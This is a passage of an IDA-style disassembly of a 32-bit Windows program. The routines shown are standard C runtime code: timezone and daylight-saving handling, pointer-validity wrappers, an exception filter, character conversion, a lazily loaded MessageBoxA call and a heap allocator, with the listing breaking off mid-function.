call sub_417AB0
inc eax
push eax
push edi
push esi
call sub_4182C0
add esp, 10h
loc_420746: ; CODE XREF: sub_4206D4+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4206D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42074B proc near ; CODE XREF: sub_41C96D+3F�p
; sub_41CA71+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_4207AF
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_4CDB88
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_4219A9
mov ds:dword_4CDBB0, eax
add esp, 18h
movsx eax, ds:byte_4CDB8A
mov ds:dword_4CDBA8, eax
pop edi
movsx eax, ds:word_4CDB88
mov ds:dword_4CDBAC, eax
mov ds:dword_4CDBB4, offset dword_4CDB8C
mov eax, offset dword_4CDBA8
pop esi
leave
retn
sub_42074B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207AF proc near ; CODE XREF: sub_42074B+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_4207FD
cmp ebx, edi
jz short loc_4207F6
lea edi, [ecx+3C00h]
jmp short loc_42081E
; ---------------------------------------------------------------------------
loc_4207F6: ; CODE XREF: sub_4207AF+3D�j
mov edi, 7FFFh
jmp short loc_42081E
; ---------------------------------------------------------------------------
loc_4207FD: ; CODE XREF: sub_4207AF+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_420815
cmp edx, ebx
jnz short loc_420815
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_420860
; ---------------------------------------------------------------------------
loc_420815: ; CODE XREF: sub_4207AF+52�j
; sub_4207AF+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_42081E: ; CODE XREF: sub_4207AF+45�j
; sub_4207AF+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_420836: ; CODE XREF: sub_4207AF+A6�j
test ecx, esi
jnz short loc_420857
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_420836
; ---------------------------------------------------------------------------
loc_420857: ; CODE XREF: sub_4207AF+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_420860: ; CODE XREF: sub_4207AF+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_4207AF endp
; ---------------------------------------------------------------------------
push 2
call sub_419CDA
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_42086E proc near ; DATA XREF: sub_4208B4�o _2:00435FE8�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_420891
cmp dword ptr [eax+10h], 3
jnz short loc_420891
cmp dword ptr [eax+14h], 19930520h
jnz short loc_420891
jmp sub_41D4FC
; ---------------------------------------------------------------------------
loc_420891: ; CODE XREF: sub_42086E+D�j
; sub_42086E+13�j ...
mov eax, ds:dword_4CDBB8
test eax, eax
jz short loc_4208AE
push eax
call sub_42090A
test eax, eax
pop ecx
jz short loc_4208AE
push esi
call ds:dword_4CDBB8
jmp short loc_4208B0
; ---------------------------------------------------------------------------
loc_4208AE: ; CODE XREF: sub_42086E+2A�j
; sub_42086E+35�j
xor eax, eax
loc_4208B0: ; CODE XREF: sub_42086E+3E�j
pop esi
retn 4
sub_42086E endp
; =============== S U B R O U T I N E =======================================
sub_4208B4 proc near ; DATA XREF: _2:00426024�o
push offset sub_42086E
call ds:off_42401C
mov ds:dword_4CDBB8, eax
retn
sub_4208B4 endp
; =============== S U B R O U T I N E =======================================
sub_4208C5 proc near ; DATA XREF: _2:0042603C�o
push ds:dword_4CDBB8
call ds:off_42401C
retn
sub_4208C5 endp
; =============== S U B R O U T I N E =======================================
sub_4208D2 proc near ; CODE XREF: sub_41CD45+6B�p
; sub_41D256+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_424018 ;; IsBadReadPtr
test eax, eax
jz short loc_4208EA
xor esi, esi
loc_4208EA: ; CODE XREF: sub_4208D2+14�j
mov eax, esi
pop esi
retn
sub_4208D2 endp
; =============== S U B R O U T I N E =======================================
sub_4208EE proc near ; CODE XREF: sub_41D256+73�p
; sub_41D256+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_4241B8 ;; IsBadWritePtr
test eax, eax
jz short loc_420906
xor esi, esi
loc_420906: ; CODE XREF: sub_4208EE+14�j
mov eax, esi
pop esi
retn
sub_4208EE endp
; =============== S U B R O U T I N E =======================================
sub_42090A proc near ; CODE XREF: sub_41D256+15B�p
; sub_42086E+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call ds:dword_424014 ;; IsBadCodePtr
test eax, eax
jz short loc_42091E
xor esi, esi
loc_42091E: ; CODE XREF: sub_42090A+10�j
mov eax, esi
pop esi
retn
sub_42090A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D4FC
loc_420922: ; CODE XREF: sub_41D4FC:loc_41D54D�j
push 0Ah
call sub_41F885
push 16h
call sub_421C3C
pop ecx
pop ecx
push 3
call sub_419AF6
; END OF FUNCTION CHUNK FOR sub_41D4FC
; =============== S U B R O U T I N E =======================================
sub_420939 proc near ; CODE XREF: sub_41D609:loc_41D648�p
cmp ds:dword_4CDC78, 0
jnz short locret_42094D
call sub_42094E
inc ds:dword_4CDC78
locret_42094D: ; CODE XREF: sub_420939+7�j
retn
sub_420939 endp
; =============== S U B R O U T I N E =======================================
sub_42094E proc near ; CODE XREF: sub_420939+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov ds:dword_4CDBC0, ebp
mov ds:dword_4366E8, ebx
mov ds:dword_4366D8, ebx
call sub_421DAE
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_420A77
push offset dword_4CDBC8
call ds:dword_42418C ;; GetTimeZoneInformation
cmp eax, ebx
jz loc_420BA6
mov eax, ds:dword_4CDBC8
mov ecx, ds:dword_4CDC1C
imul eax, 3Ch
cmp ds:word_4CDC0E, bp
push 1
pop edx
mov ds:dword_436640, eax
mov ds:dword_4CDBC0, edx
jz short loc_4209C5
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov ds:dword_436640, eax
loc_4209C5: ; CODE XREF: sub_42094E+69�j
cmp ds:word_4CDC62, bp
jz short loc_4209E9
mov eax, ds:dword_4CDC70
cmp eax, ebp
jz short loc_4209E9
sub eax, ecx
mov ds:dword_436644, edx
imul eax, 3Ch
mov ds:dword_436648, eax
jmp short loc_4209F5
; ---------------------------------------------------------------------------
loc_4209E9: ; CODE XREF: sub_42094E+7E�j
; sub_42094E+87�j
mov ds:dword_436644, ebp
mov ds:dword_436648, ebp
loc_4209F5: ; CODE XREF: sub_42094E+99�j
lea eax, [esp+14h+var_4]
mov esi, ds:dword_424150
push eax
push ebp
push 3Fh
mov edi, 220h
push ds:off_4366CC
push ebx
push offset dword_4CDBCC
push edi
push ds:dword_4CDA58
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_420A32
cmp [esp+14h+var_4], ebp
jnz short loc_420A32
mov eax, ds:off_4366CC
and byte ptr [eax+3Fh], 0
jmp short loc_420A3A
; ---------------------------------------------------------------------------
loc_420A32: ; CODE XREF: sub_42094E+D1�j
; sub_42094E+D7�j
mov eax, ds:off_4366CC
and byte ptr [eax], 0
loc_420A3A: ; CODE XREF: sub_42094E+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push ds:off_4366D0
push ebx
push offset dword_4CDC20
push edi
push ds:dword_4CDA58
call esi ; WideCharToMultiByte
test eax, eax
jz loc_420B9E
cmp [esp+14h+var_4], ebp
jnz loc_420B9E
mov eax, ds:off_4366D0
and byte ptr [eax+3Fh], 0
jmp loc_420BA6
; ---------------------------------------------------------------------------
loc_420A77: ; CODE XREF: sub_42094E+2D�j
cmp byte ptr [esi], 0
jz loc_420BA6
mov eax, ds:dword_4CDC74
cmp eax, ebp
jz short loc_420A9A
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_420BA6
loc_420A9A: ; CODE XREF: sub_42094E+139�j
push ds:dword_4CDC74
call sub_417C3B
push esi
call sub_417AB0
inc eax
push eax
call sub_417B89
add esp, 0Ch
cmp eax, ebp
mov ds:dword_4CDC74, eax
jz loc_420BA6
push esi
push eax
call sub_4179C0
push 3
push esi
push ds:off_4366CC
call sub_418C10
mov eax, ds:off_4366CC
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_420AEF
push 1
inc esi
pop edi
loc_420AEF: ; CODE XREF: sub_42094E+19B�j
push esi
call sub_417794
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov ds:dword_436640, ecx
loc_420B06: ; CODE XREF: sub_42094E+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_420B14
cmp al, bl
jl short loc_420B17
cmp al, 39h
jg short loc_420B17
loc_420B14: ; CODE XREF: sub_42094E+1BC�j
inc esi
jmp short loc_420B06
; ---------------------------------------------------------------------------
loc_420B17: ; CODE XREF: sub_42094E+1C0�j
; sub_42094E+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_420B6A
inc esi
push esi
call sub_417794
imul eax, 3Ch
pop ecx
mov ecx, ds:dword_436640
add ecx, eax
mov ds:dword_436640, ecx
loc_420B35: ; CODE XREF: sub_42094E+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_420B42
cmp al, 39h
jg short loc_420B42
inc esi
jmp short loc_420B35
; ---------------------------------------------------------------------------
loc_420B42: ; CODE XREF: sub_42094E+1EB�j
; sub_42094E+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_420B6A
inc esi
push esi
call sub_417794
pop ecx
mov ecx, ds:dword_436640
add ecx, eax
mov ds:dword_436640, ecx
loc_420B5D: ; CODE XREF: sub_42094E+21A�j
mov al, [esi]
cmp al, bl
jl short loc_420B6A
cmp al, 39h
jg short loc_420B6A
inc esi
jmp short loc_420B5D
; ---------------------------------------------------------------------------
loc_420B6A: ; CODE XREF: sub_42094E+1CC�j
; sub_42094E+1F7�j ...
cmp edi, ebp
jz short loc_420B76
neg ecx
mov ds:dword_436640, ecx
loc_420B76: ; CODE XREF: sub_42094E+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov ds:dword_436644, eax
jz short loc_420B9E
push 3
push esi
push ds:off_4366D0
call sub_418C10
mov eax, ds:off_4366D0
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_420BA6
; ---------------------------------------------------------------------------
loc_420B9E: ; CODE XREF: sub_42094E+10B�j
; sub_42094E+115�j ...
mov eax, ds:off_4366D0
and byte ptr [eax], 0
loc_420BA6: ; CODE XREF: sub_42094E+40�j
; sub_42094E+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_42094E endp
; =============== S U B R O U T I N E =======================================
sub_420BAC proc near ; CODE XREF: sub_41D609+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_436644, edi
jnz short loc_420BC0
loc_420BB9: ; CODE XREF: sub_420BAC+148�j
; sub_420BAC+150�j ...
xor eax, eax
jmp loc_420D0C
; ---------------------------------------------------------------------------
loc_420BC0: ; CODE XREF: sub_420BAC+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, ds:dword_4366D8
jnz short loc_420BDE
cmp eax, ds:dword_4366E8
jz loc_420CE0
loc_420BDE: ; CODE XREF: sub_420BAC+24�j
cmp ds:dword_4CDBC0, edi
jz loc_420CB6
movzx ecx, ds:word_4CDC6E
push ecx
cmp ds:word_4CDC60, di
movzx ecx, ds:word_4CDC6C
push ecx
movzx ecx, ds:word_4CDC6A
push ecx
movzx ecx, ds:word_4CDC68
push ecx
jnz short loc_420C30
movzx ecx, ds:word_4CDC64
push edi
push ecx
movzx ecx, ds:word_4CDC66
push ecx
movzx ecx, ds:word_4CDC62
push ecx
push eax
push ebx
jmp short loc_420C44
; ---------------------------------------------------------------------------
loc_420C30: ; CODE XREF: sub_420BAC+65�j
movzx ecx, ds:word_4CDC66
push ecx
push edi
movzx ecx, ds:word_4CDC62
push edi
push ecx
push eax
push edi
loc_420C44: ; CODE XREF: sub_420BAC+82�j
push ebx
call sub_420D58
movzx eax, ds:word_4CDC1A
add esp, 2Ch
cmp ds:word_4CDC0C, di
push eax
movzx eax, ds:word_4CDC18
push eax
movzx eax, ds:word_4CDC16
push eax
movzx eax, ds:word_4CDC14
push eax
jnz short loc_420C9E
movzx eax, ds:word_4CDC10
push edi
push eax
movzx eax, ds:word_4CDC12
push eax
movzx eax, ds:word_4CDC0E
push eax
push dword ptr [esi+14h]
push ebx
loc_420C93: ; CODE XREF: sub_420BAC+108�j
push edi
call sub_420D58
add esp, 2Ch
jmp short loc_420CE0
; ---------------------------------------------------------------------------
loc_420C9E: ; CODE XREF: sub_420BAC+C8�j
movzx eax, ds:word_4CDC12
push eax
push edi
movzx eax, ds:word_4CDC0E
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_420C93
; ---------------------------------------------------------------------------
loc_420CB6: ; CODE XREF: sub_420BAC+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_420D58
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_420D58
add esp, 58h
loc_420CE0: ; CODE XREF: sub_420BAC+2C�j
; sub_420BAC+F0�j
mov edx, ds:dword_4366DC
mov eax, ds:dword_4366EC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_420D10
cmp ecx, edx
jl loc_420BB9
cmp ecx, eax
jg loc_420BB9
cmp ecx, edx
jle short loc_420D24
cmp ecx, eax
jge short loc_420D24
loc_420D0A: ; CODE XREF: sub_420BAC+166�j
; sub_420BAC+16A�j
mov eax, ebx
loc_420D0C: ; CODE XREF: sub_420BAC+F�j
; sub_420BAC+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_420D10: ; CODE XREF: sub_420BAC+144�j
cmp ecx, eax
jl short loc_420D0A
cmp ecx, edx
jg short loc_420D0A
cmp ecx, eax
jle short loc_420D24
cmp ecx, edx
jl loc_420BB9
loc_420D24: ; CODE XREF: sub_420BAC+158�j
; sub_420BAC+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_420D4B
xor ecx, ecx
cmp eax, ds:dword_4366E0
setnl cl
loc_420D47: ; CODE XREF: sub_420BAC+1AA�j
mov eax, ecx
jmp short loc_420D0C
; ---------------------------------------------------------------------------
loc_420D4B: ; CODE XREF: sub_420BAC+18E�j
xor ecx, ecx
cmp eax, ds:dword_4366F0
setl cl
jmp short loc_420D47
sub_420BAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D58 proc near ; CODE XREF: sub_420BAC+99�p
; sub_420BAC+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_420DF3
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_420D83
shl esi, 2
mov eax, ds:dword_4366F0[esi]
jmp short loc_420D8C
; ---------------------------------------------------------------------------
loc_420D83: ; CODE XREF: sub_420D58+1E�j
shl esi, 2
mov eax, ds:dword_436724[esi]
loc_420D8C: ; CODE XREF: sub_420D58+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_420DC6
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_420DD0
; ---------------------------------------------------------------------------
loc_420DC6: ; CODE XREF: sub_420D58+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_420DD0: ; CODE XREF: sub_420D58+6C�j
cmp [ebp+arg_10], 5
jnz short loc_420E0E
cmp [ebp+arg_8], 0
jnz short loc_420DE4
mov esi, ds:dword_4366F4[esi]
jmp short loc_420DEA
; ---------------------------------------------------------------------------
loc_420DE4: ; CODE XREF: sub_420D58+82�j
mov esi, ds:dword_436728[esi]
loc_420DEA: ; CODE XREF: sub_420D58+8A�j
cmp ecx, esi
jle short loc_420E0E
sub ecx, 7
jmp short loc_420E0E
; ---------------------------------------------------------------------------
loc_420DF3: ; CODE XREF: sub_420D58+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_420E04
mov ecx, ds:dword_4366F0[eax*4]
jmp short loc_420E0B
; ---------------------------------------------------------------------------
loc_420E04: ; CODE XREF: sub_420D58+A1�j
mov ecx, ds:dword_436724[eax*4]
loc_420E0B: ; CODE XREF: sub_420D58+AA�j
add ecx, [ebp+arg_18]
loc_420E0E: ; CODE XREF: sub_420D58+7C�j
; sub_420D58+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_420E3F
mov eax, [ebp+arg_1C]
mov ds:dword_4366DC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov ds:dword_4366D8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_4366E0, eax
jmp short loc_420E94
; ---------------------------------------------------------------------------
loc_420E3F: ; CODE XREF: sub_420D58+BA�j
mov eax, [ebp+arg_1C]
mov ds:dword_4366EC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, ds:dword_436648
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_4366F0, eax
jns short loc_420E77
add eax, 5265C00h
dec ecx
mov ds:dword_4366F0, eax
jmp short loc_420E88
; ---------------------------------------------------------------------------
loc_420E77: ; CODE XREF: sub_420D58+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_420E8E
sub eax, edx
inc ecx
mov ds:dword_4366F0, eax
loc_420E88: ; CODE XREF: sub_420D58+11D�j
mov ds:dword_4366EC, ecx
loc_420E8E: ; CODE XREF: sub_420D58+126�j
mov ds:dword_4366E8, ebx
loc_420E94: ; CODE XREF: sub_420D58+E5�j
pop esi
pop ebx
pop ebp
retn
sub_420D58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420E98 proc near ; CODE XREF: sub_41D797+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_420EBB
cmp [ebp+arg_8], ebx
jz short loc_420EBB
mov al, [esi]
cmp al, bl
jnz short loc_420EC1
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_420EBB
mov [eax], bx
loc_420EBB: ; CODE XREF: sub_420E98+C�j
; sub_420E98+11�j ...
xor eax, eax
loc_420EBD: ; CODE XREF: sub_420E98+42�j
; sub_420E98+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420EC1: ; CODE XREF: sub_420E98+17�j
cmp ds:dword_4CDA48, ebx
jnz short loc_420EDC
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_420ED7
movzx ax, al
mov [ecx], ax
loc_420ED7: ; CODE XREF: sub_420E98+36�j
; sub_420E98+C0�j
push 1
pop eax
jmp short loc_420EBD
; ---------------------------------------------------------------------------
loc_420EDC: ; CODE XREF: sub_420E98+2F�j
mov ecx, ds:off_433C70
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_420F39
mov eax, ds:dword_433E7C
cmp eax, 1
jle short loc_420F20
cmp [ebp+arg_8], eax
jl short loc_420F2A
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_4CDA58
call ds:dword_424070 ;; MultiByteToWideChar
test eax, eax
mov eax, ds:dword_433E7C
jnz short loc_420EBD
loc_420F20: ; CODE XREF: sub_420E98+5C�j
cmp [ebp+arg_8], eax
jb short loc_420F2A
cmp [esi+1], bl
jnz short loc_420EBD
loc_420F2A: ; CODE XREF: sub_420E98+61�j
; sub_420E98+8B�j ...
mov ds:dword_4CD9B4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_420EBD
; ---------------------------------------------------------------------------
loc_420F39: ; CODE XREF: sub_420E98+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_4CDA58
call ds:dword_424070 ;; MultiByteToWideChar
test eax, eax
jnz loc_420ED7
jmp short loc_420F2A
sub_420E98 endp
; =============== S U B R O U T I N E =======================================
sub_420F60 proc near ; CODE XREF: sub_41D797+76�p
; sub_41D797+88�p ...
arg_0 = dword ptr 4
cmp ds:dword_433E7C, 1
jle short loc_420F77
push 8
push [esp+4+arg_0]
call sub_41A642
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420F77: ; CODE XREF: sub_420F60+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_433C70
mov al, [ecx+eax*2]
and eax, 8
retn
sub_420F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420F90 proc near ; CODE XREF: sub_41D797+797�p
; sub_41D797+7E7�p
cmp cl, 40h
jnb short loc_420FAA
cmp cl, 20h
jnb short loc_420FA0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_420FA0: ; CODE XREF: sub_420F90+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_420FAA: ; CODE XREF: sub_420F90+3�j
xor eax, eax
xor edx, edx
retn
sub_420F90 endp
; =============== S U B R O U T I N E =======================================
sub_420FAF proc near ; CODE XREF: sub_41E20D+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_420FFB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_420FCD
test al, 80h
jz short loc_420FFB
test al, 2
jnz short loc_420FFB
loc_420FCD: ; CODE XREF: sub_420FAF+14�j
cmp dword ptr [esi+8], 0
jnz short loc_420FDA
push esi
call sub_41F9D8
pop ecx
loc_420FDA: ; CODE XREF: sub_420FAF+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_420FEA
cmp dword ptr [esi+4], 0
jnz short loc_420FFB
inc eax
mov [esi], eax
loc_420FEA: ; CODE XREF: sub_420FAF+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_421001
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_421007
inc eax
mov [esi], eax
loc_420FFB: ; CODE XREF: sub_420FAF+9�j
; sub_420FAF+18�j ...
or eax, 0FFFFFFFFh
loc_420FFE: ; CODE XREF: sub_420FAF+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_421001: ; CODE XREF: sub_420FAF+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_421007: ; CODE XREF: sub_420FAF+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_420FFE
sub_420FAF endp
; =============== S U B R O U T I N E =======================================
sub_42101D proc near ; CODE XREF: sub_41F12F+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_42102E
add esp, 0Ch
retn
sub_42101D endp
; =============== S U B R O U T I N E =======================================
sub_42102E proc near ; CODE XREF: sub_42101D+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_4CEF01[eax], cl
jnz short loc_42105B
cmp [esp+arg_4], 0
jz short loc_421054
movzx eax, ds:word_433C7A[eax*2]
and eax, [esp+arg_4]
jmp short loc_421056
; ---------------------------------------------------------------------------
loc_421054: ; CODE XREF: sub_42102E+16�j
xor eax, eax
loc_421056: ; CODE XREF: sub_42102E+24�j
test eax, eax
jnz short loc_42105B
retn
; ---------------------------------------------------------------------------
loc_42105B: ; CODE XREF: sub_42102E+F�j
; sub_42102E+2A�j
push 1
pop eax
retn
sub_42102E endp
; =============== S U B R O U T I N E =======================================
sub_42105F proc near ; CODE XREF: sub_41F885+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_4CDC7C, ebx
push esi
push edi
jnz short loc_4210AE
push offset aUser32_dll ; "user32.dll"
call ds:off_4240E0
mov edi, eax
cmp edi, ebx
jz short loc_4210E4
mov esi, ds:off_4240DC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; sub_4E0076
test eax, eax
mov ds:dword_4CDC7C, eax
jz short loc_4210E4
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; sub_4E0076
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4CDC80, eax
call esi ; sub_4E0076
mov ds:dword_4CDC84, eax
loc_4210AE: ; CODE XREF: sub_42105F+B�j
mov eax, ds:dword_4CDC80
test eax, eax
jz short loc_4210CD
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4210CD
mov eax, ds:dword_4CDC84
test eax, eax
jz short loc_4210CD
push ebx
call eax
mov ebx, eax
loc_4210CD: ; CODE XREF: sub_42105F+56�j
; sub_42105F+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_4CDC7C
loc_4210E0: ; CODE XREF: sub_42105F+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4210E4: ; CODE XREF: sub_42105F+1C�j
; sub_42105F+33�j
xor eax, eax
jmp short loc_4210E0
sub_42105F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210E8 proc near ; CODE XREF: sub_41FA42+22�p
; sub_41FA42+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_421109
test esi, esi
jnz short loc_421103
push 1
pop esi
loc_421103: ; CODE XREF: sub_4210E8+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_421109: ; CODE XREF: sub_4210E8+12�j
; sub_4210E8+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_421168
mov eax, ds:dword_4CF028
cmp eax, 3
jnz short loc_421134
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4CF020
ja short loc_421153
push eax
call sub_41B0DD
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42117E
jmp short loc_421153
; ---------------------------------------------------------------------------
loc_421134: ; CODE XREF: sub_4210E8+30�j
cmp eax, 2
jnz short loc_421153
cmp esi, ds:dword_435EB4
ja short loc_421153
mov eax, esi
shr eax, 4
push eax
call sub_41BB80
mov edi, eax
pop ecx
test edi, edi
jnz short loc_421192
loc_421153: ; CODE XREF: sub_4210E8+3B�j
; sub_4210E8+4A�j ...
push esi
push 8
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_42118C
loc_421168: ; CODE XREF: sub_4210E8+26�j
cmp ds:dword_4CDA14, 0
jz short loc_42118C
push esi
call sub_41AB54
test eax, eax
pop ecx
jz short loc_421195
jmp short loc_421109
